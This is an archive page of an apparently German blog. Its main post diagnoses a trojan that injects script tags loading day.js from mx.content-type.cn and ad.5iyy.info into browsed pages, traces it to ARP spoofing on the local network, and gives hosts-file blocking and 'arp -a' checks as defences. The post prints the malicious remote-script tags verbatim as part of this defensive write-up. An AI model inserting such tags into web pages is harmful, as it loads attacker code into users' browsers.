Um Lotus Notes mit Googlemail zum laufen zu bekommen Continue reading Lotus Notes und Googlemail/GMail/Google Apps IMAP nutzen
All posts by admin
mx.content-type.cn oder ad.5iyy.info Virus enttarnt!
Update: siehe unten wie man den Virus findet
Alle Webseiten welche geladen werden enthalten an erster Stelle den Code:
<script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>
/* Update vom 07.07.2008: Es wird jetzt ein neues JS geladen: */
<script language="javascript" SRC="http://ad.5iyy.info/day.js"></script>
Wirklich unschön wenn ein und derselbe eklige Trojaner das ganze Team blockiert.
Wir haben uns den Trojaner mittlerweile mit 7 PCs eingefangen, wo auch immer das Ding herkam.
Bis jetzt sieht es fast aus als könnte es ein Rootkit sein, da sowohl IE, FF wie auch Opera betroffen sind und Virenscanner ihn nicht finden,
verdächtige Prozesse sind auch nicht auszumachen.
Um dem Trojaner zumindest die Funktion zu nehmen kann man ganz einfach das Windows Hostfile editieren (c:\windows\system32\drivers\etc\hosts).
Dort folgende Einträge hinzufügen:
127.0.0.1 mx.content-type.cn
127.0.0.1 content-type.cn
127.0.0.1 ad.5iyy.info
127.0.0.1 5iyy.info
Danach folgendes in die Eingabeaufforderung (Start -> Ausführen) eingeben:
ipconfig /flushdns
Damit spielt man dem System vor, dass die Domain mx.content-type.cn auf dem eigenen PC liegt wodurch das Script nicht mehr geladen werden kann. Der Trojaner ist dann zumindest nicht mehr gefährlich, wenn er auch noch nicht gelöscht ist.
Folgende Virenscanner erkennen das Ding bisher nicht:
- AntivirXP/Avira
- LavaSoft Ad-Aware
- Spybot Search&Destroy
- Kaspersky Online Scanner
- Kaspersky AntiVirus
- AVG Antivirus
- AVAST Antivirus
- CCleaner
Es gibt ein Update wenn bekannt ist wie man das Teil los wird.
Schönen Gruß an mx.content-type.cn und ad.5iyy.info 🙂
Update:
Teilweise scheint der Trojaner inaktiv zu sein, nach Neustart der Netzwerkverbindung war er plötzlich wieder an Bord und in allen Browsern (ohne die Browser neu zu starten).
Es sieht danach aus als würde das Teil eine Art “unsichtbaren” (rootkit?) lokalen Proxy starten über welchen dann der komplette Traffic läuft.
Update, wir sind dem Problem auf der Spur!
Der Trojaner befindet sich nicht auf dem PC auf dem er zu sein scheint.
Probiert folgendes aus um den tatsächlichen Verursacher zu finden:
Auf dem PC auf dem der Javascript-Code eingefügt wird:
Start -> ausführen -> cmd -> “arp -a”
Ihr solltet dann eine Tabelle in folgender Form finden:
Internet Address Physical Address Type
192.168.1.1 00-40-f4-9e-57-21 dynamic
192.168.1.5 00-40-f4-9e-57-27 dynamic
192.168.1.119 00-40-f4-9e-57-21 dynamic
Sucht darin nach der “Physical Address” des Gateway-Computers oder einfach nur nach evtl. doppelt vorkommenden Adressen in der zweiten Spalte.
In kopiertem Beispiel war der PC mit der echten Adresse “192.168.1.119” der Verursacher des Übels.
Auf diesem läuft das Schadprogramm. Wir sind gerade dabei dort nach Viren zu scannen.
English version:
If you got the problem that in every loaded page appears a javascript tag like <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>
this is the solution for your problem.
The cause is a trojan horse (virus) on another computer in your network!
This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the internet and filters it in order to put its malicious code.
You can find out which computer is the evil one by typing following into your command line:
arp -a
In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
Find out which computer is the other IP and you will have the virus host.
Scan that one for virus and malware (we are just about to conduct that scan).
Bluepage CMS im Vergleich
Im Rahmen einer Angebotsvorbereitung habe ich mich heute mit Bluepage CMS von ISS Oberlausitz beschäftigt, da es in der Region mittlerweile bei einigen Websites zum Einsatz kommt.
Ursprünglich dachte ich, es handelt sich dabei um ein OpenSource Projekt und kann beliebig modifiziert werden, dem ist aber nicht so. Continue reading Bluepage CMS im Vergleich
UTF8 Zeichensatz bei Websites – Webmaster aufgewacht!
2005 hat das W3C (Internationales Komittee zur Standarisierung von Webinhalten) eine Empfehlung für den Unicode-Zeichensatz als erste Wahl für Internet-Seiten veröffentlicht.
Schaut man sich heute als Programmierer im Internet um oder arbeitet an Skripten Continue reading UTF8 Zeichensatz bei Websites – Webmaster aufgewacht!
Alexa/IVW Ranking traditionelle Tageszeitungen/Magazine im Web
Ein kurzer Überblick über deutsche Nachrichten-Magazine und Tageszeitungen im Internet. Dabei nicht erwähnt sind reine IT-Magazine oder andere Fachzeitschriften, da diese für mich schlicht nicht relevant waren.
Continue reading Alexa/IVW Ranking traditionelle Tageszeitungen/Magazine im Web